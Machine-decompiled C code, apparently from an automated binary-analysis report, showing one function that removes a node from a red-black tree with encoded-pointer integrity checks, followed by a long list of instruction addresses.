                                                                        C-Code - Quality: 99%
                                                                        			E013BF900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}








































































































                                                                        0x013bf90b
                                                                        0x013bf911
                                                                        0x013bf917
                                                                        0x013bf919
                                                                        0x013bf91c
                                                                        0x01415d63
                                                                        0x01415d69
                                                                        0x01415d69
                                                                        0x01415d63
                                                                        0x013bf922
                                                                        0x013bf927
                                                                        0x01415d72
                                                                        0x01415d78
                                                                        0x01415d78
                                                                        0x01415d72
                                                                        0x013bf92d
                                                                        0x013bf931
                                                                        0x013bfa2d
                                                                        0x013bfa2d
                                                                        0x013bf939
                                                                        0x013bf940
                                                                        0x013bf944
                                                                        0x013bfa37
                                                                        0x013bfa39
                                                                        0x013bfa3c
                                                                        0x013bfa3e
                                                                        0x013bfa41
                                                                        0x013bfa48
                                                                        0x013bfe68
                                                                        0x013bfe6c
                                                                        0x013bfe6c
                                                                        0x013bfe78
                                                                        0x013bfe78
                                                                        0x013bfe7a
                                                                        0x013bfe7a
                                                                        0x013bfe7e
                                                                        0x013bfe6e
                                                                        0x013bfe6e
                                                                        0x013bfe72
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013bfe80
                                                                        0x013bfe80
                                                                        0x013bfe83
                                                                        0x00000000
                                                                        0x013bfe83
                                                                        0x01415d7f
                                                                        0x01415d81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01415d87
                                                                        0x00000000
                                                                        0x01415d87
                                                                        0x013bfa4e
                                                                        0x013bfa50
                                                                        0x01415d90
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01415d98
                                                                        0x013bfa58
                                                                        0x013bfa58
                                                                        0x013bfa5d
                                                                        0x013bfa60
                                                                        0x013bfa63
                                                                        0x013bfa69
                                                                        0x013bfa6b
                                                                        0x013bfa6e
                                                                        0x013bfa71
                                                                        0x01415da1
                                                                        0x01415da7
                                                                        0x01415da7
                                                                        0x01415da1
                                                                        0x013bfa79
                                                                        0x013c0071
                                                                        0x013c0073
                                                                        0x013c0074
                                                                        0x00000000
                                                                        0x013bfa7f
                                                                        0x013bfa83
                                                                        0x013bfa85
                                                                        0x01415dae
                                                                        0x01415dae
                                                                        0x013bfa8b
                                                                        0x013bfa8f
                                                                        0x013bfa98
                                                                        0x013bfaa1
                                                                        0x013bfaa4
                                                                        0x013bfaa6
                                                                        0x013bfaa9
                                                                        0x013bfaac
                                                                        0x01415db7
                                                                        0x01415dbd
                                                                        0x01415dbd
                                                                        0x01415db7
                                                                        0x013bfab4
                                                                        0x00000000
                                                                        0x013bfaba
                                                                        0x013bfabc
                                                                        0x013bfac2
                                                                        0x013bfac5
                                                                        0x013bfac7
                                                                        0x013bfac7
                                                                        0x013bfad6
                                                                        0x013bfad9
                                                                        0x013bfadf
                                                                        0x013bfae2
                                                                        0x013bfae4
                                                                        0x013bfae7
                                                                        0x013bfaea
                                                                        0x013bfaed
                                                                        0x01415dc4
                                                                        0x01415dc9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01415dcf
                                                                        0x013bfaf6
                                                                        0x013bfafa
                                                                        0x013bfafc
                                                                        0x013bfafc
                                                                        0x013bfafe
                                                                        0x013bfb01
                                                                        0x013bfb09
                                                                        0x013bfb0c
                                                                        0x013bfb12
                                                                        0x013bfb14
                                                                        0x013bfb17
                                                                        0x01415dd6
                                                                        0x01415dd9
                                                                        0x01415dde
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01415de4
                                                                        0x01415de7
                                                                        0x013bfb29
                                                                        0x013bfb2c
                                                                        0x01415df3
                                                                        0x01415df6
                                                                        0x01415e06
                                                                        0x01415e0c
                                                                        0x01415e0f
                                                                        0x01415e11
                                                                        0x00000000
                                                                        0x01415e1f
                                                                        0x00000000
                                                                        0x01415e1f
                                                                        0x01415e11
                                                                        0x01415df8
                                                                        0x01415dfb
                                                                        0x01415e00
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01415e02
                                                                        0x00000000
                                                                        0x01415e02
                                                                        0x013bfb32
                                                                        0x013bfb35
                                                                        0x013bfb3c
                                                                        0x01415e26
                                                                        0x01415e28
                                                                        0x01415e28
                                                                        0x01415e2e
                                                                        0x01415e3c
                                                                        0x01415e3c
                                                                        0x01415e2e
                                                                        0x013bfb45
                                                                        0x013bfb47
                                                                        0x013bfb53
                                                                        0x013bfb56
                                                                        0x013bfb59
                                                                        0x013bfb5c
                                                                        0x013bfb65
                                                                        0x013c000d
                                                                        0x00000000
                                                                        0x013c000f
                                                                        0x013c000f
                                                                        0x00000000
                                                                        0x013c000f
                                                                        0x013bfb6b
                                                                        0x013bfb6e
                                                                        0x013bfb71
                                                                        0x013bfb73
                                                                        0x013bfb76
                                                                        0x01415e45
                                                                        0x01415e4b
                                                                        0x01415e4b
                                                                        0x01415e45
                                                                        0x013bfb80
                                                                        0x013bfb83
                                                                        0x01415e54
                                                                        0x01415e5a
                                                                        0x01415e5a
                                                                        0x01415e54
                                                                        0x013bfb89
                                                                        0x013bfb98
                                                                        0x013bfb9b
                                                                        0x013bfb9e
                                                                        0x013bfba0
                                                                        0x01415e63
                                                                        0x01415e69
                                                                        0x01415e69
                                                                        0x01415e63
                                                                        0x013bfba8
                                                                        0x00000000
                                                                        0x013bfbae
                                                                        0x013bfbb2
                                                                        0x01415e70
                                                                        0x013bfbb8
                                                                        0x013bfbb8
                                                                        0x013bfbb8
                                                                        0x013bfbbd
                                                                        0x013bfbbf
                                                                        0x013bfbbf
                                                                        0x013bf9a8
                                                                        0x013bf9a8
                                                                        0x013bf9ad
                                                                        0x013bf9b4
                                                                        0x01415eda
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01415ee2
                                                                        0x013bf9bc
                                                                        0x013bf9bc
                                                                        0x013bf9bf
                                                                        0x013bf9c4
                                                                        0x013bfde6
                                                                        0x013bfde9
                                                                        0x013bfdec
                                                                        0x013bfdef
                                                                        0x013bfdf2
                                                                        0x01415eeb
                                                                        0x01415ef1
                                                                        0x01415ef1
                                                                        0x01415eeb
                                                                        0x013bfdfa
                                                                        0x00000000
                                                                        0x013bfe00
                                                                        0x013bfe04
                                                                        0x01415efa
                                                                        0x01415f00
                                                                        0x01415f00
                                                                        0x01415efa
                                                                        0x013bfe0a
                                                                        0x013bfa24
                                                                        0x013bfa2a
                                                                        0x013bfa2a
                                                                        0x013bfdfa
                                                                        0x013bf9cd
                                                                        0x00000000
                                                                        0x013bf9cf
                                                                        0x013bf9cf
                                                                        0x013bf9d1
                                                                        0x013bf9d4
                                                                        0x013bf9d7
                                                                        0x013bf9d9
                                                                        0x013bf9dc
                                                                        0x013bf9df
                                                                        0x013bf9e2
                                                                        0x013bf9e7
                                                                        0x01415f09
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01415f11
                                                                        0x013bf9ef
                                                                        0x013bf9f3
                                                                        0x013bfed5
                                                                        0x013bfed8
                                                                        0x013bfedb
                                                                        0x01415f1a
                                                                        0x01415f20
                                                                        0x01415f20
                                                                        0x01415f1a
                                                                        0x013bfee3
                                                                        0x00000000
                                                                        0x013bfee9
                                                                        0x013bfeeb
                                                                        0x01415f29
                                                                        0x01415f2f
                                                                        0x01415f2f
                                                                        0x01415f29
                                                                        0x013bfef3
                                                                        0x00000000
                                                                        0x013bfef9
                                                                        0x013bfefc
                                                                        0x013bff01
                                                                        0x01415f38
                                                                        0x013c0052
                                                                        0x013c0054
                                                                        0x00000000
                                                                        0x013c0056
                                                                        0x013c0056
                                                                        0x013bff40
                                                                        0x013bff42
                                                                        0x01415f6e
                                                                        0x01415f74
                                                                        0x01415f74
                                                                        0x01415f6e
                                                                        0x013bff50
                                                                        0x013bff56
                                                                        0x013bff5b
                                                                        0x01415f7d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01415f83
                                                                        0x00000000
                                                                        0x013bff61
                                                                        0x013bff61
                                                                        0x013bff63
                                                                        0x013c0021
                                                                        0x013c0026
                                                                        0x013c002b
                                                                        0x013c007e
                                                                        0x013c0080
                                                                        0x013c0080
                                                                        0x013c007e
                                                                        0x013c002f
                                                                        0x00000000
                                                                        0x013c0031
                                                                        0x013c0033
                                                                        0x013c0086
                                                                        0x013c0035
                                                                        0x013c0035
                                                                        0x013c0035
                                                                        0x013c003c
                                                                        0x00000000
                                                                        0x013c003c
                                                                        0x013c002f
                                                                        0x013bff69
                                                                        0x013bff6b
